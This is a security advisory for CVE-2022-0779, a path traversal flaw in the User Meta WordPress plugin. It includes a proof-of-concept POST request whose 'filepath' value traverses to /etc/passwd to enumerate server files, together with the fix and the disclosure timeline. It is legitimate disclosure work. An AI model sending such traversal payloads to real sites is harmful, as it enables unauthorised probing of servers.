Get in touch

User Meta “um_show_uploaded_file” Path Traversal / Local File Enumeration

May 24, 2022 · By Julien Ahrens

ADVISORY INFORMATION

  • Product: User Meta
  • Vendor URL: https://wordpress.org/plugins/user-meta
  • Type: Relative Path Traversal [CWE-23]
  • Date found: 2022-02-28
  • Date published: 2022-05-24
  • CVSSv3 Score: 4.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)
  • CVE: CVE-2022-0779

CREDITS

This vulnerability was discovered and researched by Julien Ahrens from RCE Security.

VERSIONS AFFECTED

User Meta Lite 2.4.3 and below User Meta Pro 2.4.3 and below

INTRODUCTION

An easy-to-use user profile and management plugin for WordPress that allows user login, reset-password, profile update and user registration with extra fields, all on front-end and many more. User Meta Pro is a versatile user profile builder and user management plugin for WordPress that has the most features on the market. User Meta aims to be your only go to plugin for user management.

(from the vendor’s homepage)

VULNERABILITY DETAILS

The WordPress ajax action “um_show_uploaded_file” is vulnerable to an authenticated path traversal when user-supplied input to the HTTP POST parameter “filepath” is processed by the web application. Since the application does not properly validate and sanitize this parameter, it is possible to enumerate local server files using a blind approach. This is because the application doesn’t return the contents of the referenced file but instead returns different form elements based on whether a file exists or not.

The following Proof-of-Concept triggers this vulnerability:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 147
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: [your-wordpress-auth-cookies]
Connection: close

field_name=[your-field-name]&filepath=/../../../../../etc/passwd&field_id=[your-field-id]&form_key=[your-form-key]&action=um_show_uploaded_file&pf_nonce=[your-auth-nonce]&is_ajax=true

RISK

The vulnerability can be used by an authenticated attacker to enumerate local server files based on a blind approach.

SOLUTION

Update to User Meta/User Meta Pro 2.4.4

REPORT TIMELINE

  • 2022-02-28: Discovery of the vulnerability
  • 2022-02-28: WPScan (CNA) assigns CVE-2022-0779
  • 2022-03-03: Contacted the vendor via their contact form
  • 2022-03-06: Vendor response, acknowledgement of the issue
  • 2022-03-18: Version 2.4.2 is released
  • 2022-03-22: Vulnerability is still exploitable since fix was applied only client-side. Contacted vendor again.
  • 2022-04-13: No response, contacted vendor again
  • 2022-04-18: Vendor added a new fix to version 2.4.3. Asked to retest.
  • 2022-04-19: Vulnerability is still exploitable due to a logic bug in the fix. Contacted vendor again.
  • 2022-04-29: Vendor asks whether another fix in version 2.4.4 is fine
  • 2022-05-16: Fix seems to work
  • 2022-05-24: Public disclosure

REFERENCES